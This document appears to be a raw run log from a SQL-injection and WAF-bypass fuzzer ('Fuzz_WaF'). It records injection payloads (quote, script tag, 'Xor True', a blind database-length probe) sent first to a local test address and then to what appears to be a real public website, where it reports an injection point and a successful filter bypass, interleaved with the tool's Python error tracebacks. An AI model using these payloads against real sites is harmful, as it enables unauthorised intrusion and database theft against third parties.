 _____               __        __    _____ 
|  ___|   _ ________ \ \      / /_ _|  ___|
| |_ | | | |_  /_  /  \ \ /\ / / _` | |_   
|  _|| |_| |/ / / /    \ V  V / (_| |  _|  
|_|   \__,_/___/___|    \_/\_/ \__,_|_|   



[*]payloads1 -> http://192.168.1.106/t1.php?id='
Error1 ->  Traceback (most recent call last):
  File "main.py", line 350, in collect_waf_page
    r = self.req_(urls)
  File "main.py", line 93, in req_
    r = r.content.decode(encodes)
TypeError: decode() argument 1 must be str, not None

Error2 ->  Traceback (most recent call last):
  File "main.py", line 350, in collect_waf_page
    r = self.req_(urls)
  File "main.py", line 93, in req_
    r = r.content.decode(encodes)
TypeError: decode() argument 1 must be str, not None

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "main.py", line 364, in collect_waf_page
    urls = url1 + pars + payloads
TypeError: can only concatenate list (not "str") to list

[-]不存在注入点 | payloads -> http://192.168.1.106/t1.php?id=1




####################################################################3

[*]payloads1 -> http://www.jxkzyyy.com/index.php?ac='
[*]payloads1 -> http://www.jxkzyyy.com/index.php?ac=<script>
[+]存在注入点 | payloads -> http://www.jxkzyyy.com/index.php?ac=article&at=list&tid=12

[*]payloads3 -> http://www.jxkzyyy.com/index.php?ac=Xor True
[+]过滤绕过成功 | payloads -> http://www.jxkzyyy.com/index.php?ac=article&at=list&tid=12

[*]payloads5 -> http://www.jxkzyyy.com/index.php?ac=article&at%20%26%26%20(length(database/**/())=0)
Error1 ->  Traceback (most recent call last):
  File "../Fuzz_WaF/main.py", line 460, in Judging_database_length1
    self.SAVE_INFO(urls)
  File "/home/remix/Tools/Fuzz_WaF/log.py", line 21, in SAVE_INFO
    self.SAVE_LOG()
  File "/home/remix/Tools/Fuzz_WaF/log.py", line 17, in SAVE_LOG
    logging.basicConfig(filename='./log/log.txt', level=logging.DEBUG, format=fmt)
  File "/usr/lib/python3.6/logging/__init__.py", line 1806, in basicConfig
    h = FileHandler(filename, mode)
  File "/usr/lib/python3.6/logging/__init__.py", line 1030, in __init__
    StreamHandler.__init__(self, self._open())
  File "/usr/lib/python3.6/logging/__init__.py", line 1059, in _open
    return open(self.baseFilename, self.mode, encoding=self.encoding)
FileNotFoundError: [Errno 2] No such file or directory: '/home/remix/Tools/DiscoverTarget/log/log.txt'

